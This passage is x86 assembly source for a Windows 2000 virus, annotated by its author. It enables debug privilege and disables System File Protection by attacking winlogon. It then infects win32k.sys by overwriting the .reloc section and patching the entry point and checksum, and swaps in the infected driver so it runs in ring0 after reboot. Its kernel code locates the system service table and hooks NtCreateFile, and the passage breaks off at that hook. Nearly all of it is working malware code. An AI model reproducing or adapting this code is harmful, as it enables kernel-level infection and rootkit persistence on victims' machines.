;;;;;;;;;;;;;;;;;;;;;;;;
push eax ;i have unprotected the memory of code of virus
lea esi,[ebp + svirus]
mov ecx,tamvirus
xor ebx,ebx
callz UnprotectMem
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
pop eax ;I get other used librarys
mov [ebp + NtKernel],eax
callz GetLibrarys
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel] ;Ill keep the current directory
GezApi eax,GetCurrentDirectoryACRC,GCDNameLen
lea ebx,[ebp + CurDir]
push ebx
push 256
call eax;we keep current dir for restoring
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ecx,cs ;The virus will work in win2k only
xor cl,cl
or ecx,ecx
jne Exit
mov eax,[ebp + NtKernel] ;Im in NT but i want win2k...
GezApi eax,GetVersionCRC,GVNameLen
call eax
test eax,80000000h
jnz Exit
cmp al,5 ;i test for win2k(i think XP is 5 too)
jne Exit
;Im not sure if this will work in NT previous machines perhaps but ill code for win2k.
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel] ;we go to system32 directory first
GezApi eax,GetWindowsDirectoryACRC,GWDNameLen
push 256
lea ebx,[ebp + Buffer]
push ebx
call eax
lea esi,[ebp + Buffer]
CalcLenString
mov edi,esi
add edi,ecx
mov al,'\'
stosb
mov eax,'tsys'
stosd
mov eax,'23me'
stosd
xor al,al
mov [edi],al
mov eax,[ebp + NtKernel]
GezApi eax,SetCurrentDirectoryACRC,SCDNameLen
lea esi,[ebp + Buffer]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;I want to enable Debug privilege for token of this user. touch_privilege was coded by Ratter
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtAdvapi] ;enabling debug privilege for this user
GezApi eax,AdjustTokenPrivilegesCRC,ATPNameLen
mov [ebp + tAdjustTokenPrivileges],eax
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
mov [ebp + tCloseHandle],eax
mov eax,[ebp + NtAdvapi]
GezApi eax,LookupPrivilegeValueACRC,LPVNameLen
mov [ebp + tLookupPrivilegeValueA],eax
mov eax,[ebp + NtAdvapi]
GezApi eax,OpenProcessTokenCRC,OPTNameLen
mov [ebp + tOpenProcessToken],eax
mov eax,[ebp + NtKernel]
GezApi eax,GetCurrentProcessCRC,GCPNameLen
mov [ebp + tGetCurrentProcess],eax
push SE_PRIVILEGE_ENABLED
pop eax
@pushsz "SeDebugPrivilege"
pop esi
call touch_privilege
;;;;;;;;;;;;;;;;;;;;;;;;
;Now ill disable sfp with Benny&Ratter method
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz GetWinlogon ;I have debug priv so ill disable sfc with benny&ratter method
or eax,eax
jnz Exit
callz AttackWinlogon
or eax,eax
jnz Exit
;;;;;;;;;;;;;;;;;;;;;;;;
;Now infection of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;U will see in this part lot of move and copy files but i do it for ensuring the
;perfect working of the virus...I had some problems with sfc disabling due this code
;was executed before sfc disabling code so finally win32k.sys was not infected the first
;time that virus was executed in that system uninfected still...but i have correct that
;problem doing some movings and copyings of files...that file here,that file there and
;virus works perfectly now ;P
;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + _WIN32_FIND_DATA] ;Search win32k.sy
push eax
lea eax,[ebp + win32ksy]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindFirstFileACRC,FFFNameLen
call eax
cmp eax,0FFFFFFFFh
je NoWin32sySoContinue
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindCloseCRC,FCNameLen
call eax
lea esi,[ebp + win32ksys]
push esi
mov eax,[ebp + NtKernel] ;deleting win32k.sys if it would exist
GezApi eax,DeleteFileACRC,DFNameLen
call eax
mov eax,[ebp + NtKernel] ;renaming win32k.sy to win32k.sys
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksys]
push esi
lea esi,[ebp + win32ksy]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
NoWin32sySoContinue:
mov eax,[ebp + NtKernel] ;we copy win32k.sys to win32k.fuck
GezApi eax,CopyFileACRC,CpFNameLen
push 0
lea esi,[ebp + win32kfuck]
push esi
lea esi,[ebp + win32ksys]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;Why of this?:
;The original win32k.sys is been used by the system so we can modify it...however we can
;change its name. We copy it to win32k.fuck and infect the .fuck file...
;later we renaming win32k.sys to win32k.sy and win32k.fuck to win32k.sys
;and this new win32k.sys will be loaded in ring0 the next time that system reboot.
;i copy .sys to .fuck for no infecting directly over win32k.sys
;coz i had problems...i tried to infect directly over win32k.sys but sometimes(lot of times)
;when i called functions as CreateFile or others, i got this error from GetLastError:
;32(20h)(The process cannot access the file because it is being used by another process)
;I supposed that win32k.sys is a file used lot of times and if i infected directly over
;win32k.sys i would get this error lot of times....so finally i decided to do a copy
;named win32k.fuck for later renaming this file to win32k.sys when already infected.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Now ill infect win32k.fuck
;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + _WIN32_FIND_DATA] ;Mapping win32k.fuck
push eax
lea eax,[ebp + win32kfuck]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindFirstFileACRC,FFFNameLen
call eax
mov [ebp + SearchHand],eax
cmp eax,0FFFFFFFFh
je Exit
callz MapFile
or eax,eax
jz Exit
;;;;;;;;;;;;;;;;;;;;;;;;
;INFECTION OF WIN32K.FUCK
;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + ViewHandle] ;a simple infection overwriting reloc section
mov edx,eax
mov ebx,[eax + 3ch]
add eax,ebx
;eax -> PE
mov bx,word ptr [eax + 8]
cmp bx,'zv'
je StopInfection ;becoz already Infected
mov word ptr [eax + 8],'zv' ;a small mark ;)
mov ebx,[eax + 28h] ;EPoint of win32k.sys
mov [ebp + EntryPointWin32ksys],ebx
xor ecx,ecx
mov cx,word ptr [eax + 6]
dec ecx
mov ebx,eax
add ebx,0F8h ;sections
GoToLastSection:
add ebx,28h
loop GoToLastSection
;ebx -> .reloc ;over-reloc infection of win32k.sys
cmp [ebx],'ler.'
jne StopInfection
mov dword ptr [ebx + 24h],040000040h ;reloc not discardable,readable,writable
mov ecx,[ebx + 10h]
cmp ecx,tamvirus
jb StopInfection
;i change entry point of win32k.sys
mov edi,[ebx + 0ch]
add edi,EPointSystem - svirus
mov [eax + 28h],edi ;RVA new entry point for win32k.sys
;ill copy the code overwriting .reloc
mov edi,[ebx + 14h]
add edi,edx
lea esi,[ebp + svirus]
mov ecx,tamvirus
rep movsb
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,'vzvz'
StopInfection: ;Unmmaping win32k.fuck
push eax
callz CloseAll
pop eax
cmp eax,'vzvz'
jne SysAlreadyInfected
;;;;;;;;;;;;;;;;;;;;;;;;
;IMPORTANT: I MUST CORRECT WIN32K.FUCK HEADER CKSUM AFTER INFECTION OR SYSTEM WILL NOT START
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtImagehlp] ;I correct the cksum of the file win32k.fuck
GezApi eax,MapFileAndCheckSumACRC,MFACSNameLen
lea esi,[ebp + aux]
push esi
lea esi,[ebp + Needed]
push esi
lea esi,[ebp + win32kfuck]
push esi
call eax ;get cksum
callz MapFile
or eax,eax
jz Exit
mov eax,[ebp + ViewHandle]
mov ebx,[eax + 3ch]
add eax,ebx
;eax -> PE
mov ebx,[ebp + aux]
mov [eax + 58h],ebx
callz CloseAll
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
push dword ptr [ebp + SearchHand] ;Closing the search hand
mov eax,[ebp + NtKernel]
GezApi eax,FindCloseCRC,FCNameLen
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel] ;renaming win32k.sys to win32k.sy
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksy]
push esi
lea esi,[ebp + win32ksys]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel] ;renaming win32k.fuck to win32k.sys
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksys]
push esi
lea esi,[ebp + win32kfuck]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;
;Exit
;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
Exit:
mov eax,[ebp + NtKernel] ;Exit from virus code...
GezApi eax,SetCurrentDirectoryACRC,SCDNameLen
lea esi,[ebp + CurDir]
push esi
call eax ;we restore current directory.
callz FreeLibrarys ;free librarys loaded.
or ebp,ebp ;first generation exit, ExitProcess.
jnz gen2Exit
push 0
call ExitProcess
gen2Exit:
mov eax,[ebp + NtKernel] ;second generation exit,jumpin old epoint.
GezApi eax,GetModuleHandleACRC,GMHNameLen
push 00000000h
call eax
;eax -> this module
add eax,[ebp + EntryPoint]
jmp eax ;old entry point
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
SysAlreadyInfected:
lea esi,[ebp + win32kfuck]
push esi
mov eax,[ebp + NtKernel] ;deleting win32k.fuck if it would exist
GezApi eax,DeleteFileACRC,DFNameLen
call eax
jmpz Exit
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Entry Point Of Virus when is executed in ring0.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
EPointSystem: ;Ring0 Code
;;;;;;;;;;;;;
push 00000000h ;This space in stack will be filled with the entry point
;address of win32k.sys
pushfd
pushad
;;;;;;;;;;;;;;;;;;;;;;;;
callz R0_Doff ;i calculate delta offset.
R0_Doff:
pop ebp
sub ebp,offset R0_Doff
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + EPointSystem] ;our target is to search image base of win32k.sys in memory.
xor ax,ax ;hardcoded would be 0A0000000h in my system.
add eax,1000h
SearchBaseImage:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchBaseImage
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + EntryPointWin32ksys] ;We have the old entry point and the image base
add ebx,eax ;so we have the entry point address. We put
mov [esp + cPushad + cPushfd],ebx ;that entry point after pushad and pushfd bytes
;;;;;;;;;;;;;;;;;;;;;;;; ;in stack for using ret instruction later and
;for jumping entry point of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[esp + cPushad + cPushfd + 4] ;address in stack of a zone of ntoskrnl(in function
xor ax,ax ;ExCreateCallback).With this address we will get
add eax,1000h ;ntoskrnl base addr
;eax -> a part of ntoskrnl
SearchNtoskrnl:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchNtoskrnl
;eax -> base of ntoskrnl
mov [ebp + Ntoskrnl],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;now we will get somethings that will be useful for hooking NtCreateFile...SSDT address,
;syscall number of NtCreateFile, ....
;There is a undocumented entry in the export table of ntoskrnl, KeServiceDescriptorTable,
;and this entry is the key for accessing the system service dispatch table where we must
;patch for hooking a service(NtCreateFile for example ;)
;KeServiceDescriptorTable points to a structure like this:
; {
; DWORD ServiceTableBase - pointer to system service dispatch table(SSDT)
; DWORD ServiceCounterTable - not important for us
; DWORD NumberOfServices - number of services in system service dispatch table
; DWORD ParamTableBase - pointer to system service parameter table(SSPT)
; }
;
;We want to get the number of the NtCreateFile service and then we search in this table
;and we patch the address of NtCreateFile rutine with a address of our code
;;;;;;;;;;;;;;;;;;;;;;;;
;eax = ntoskrnl base
GezApi eax,KeServiceDescriptorTableCRC,KSDTNameLen
mov [ebp + KeServiceDescriptorTable],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;ill get SSDT from that service descriptor table
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[eax]
mov [ebp + SSDT],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;now ill get from ntoskrnl the addr for NtCreateFile for searching in the table
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezApi eax,NtCreateFileCRC,NCFNameLen
mov [ebp + NtCreateFileAddr],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;now ill search in the SSDT the address of the entry of NtCreateFile where we will hook
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + SSDT]
mov eax,[ebp + KeServiceDescriptorTable]
mov ecx,[eax + 8] ;number of services
mov edx,[ebp + NtCreateFileAddr]
SearchNtCreateFileEntry:
mov eax,[ebx + ecx*4 - 4]
cmp eax,edx
loopnz SearchNtCreateFileEntry
;ebx + ecx*4 -> entry
shl ecx,2
add ebx,ecx
;ebx -> entry
mov [ebp + NtCreateFileEntryAddr],ebx
;note we could have finished the entire table without finding the entry...becoz ecx = 0
;so we will compare again
mov eax,[ebx]
cmp eax,edx
jne ReturnWin32ksys
;;;;;;;;;;;;;;;;;;;;;;;;
;We hook NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
;ebx = address of entry of NtCreateFile in SSDT
lea eax,[ebp + NtCreateFileHookRutine]
mov [ebx],eax ;in this moment we HOOK NtCreateFile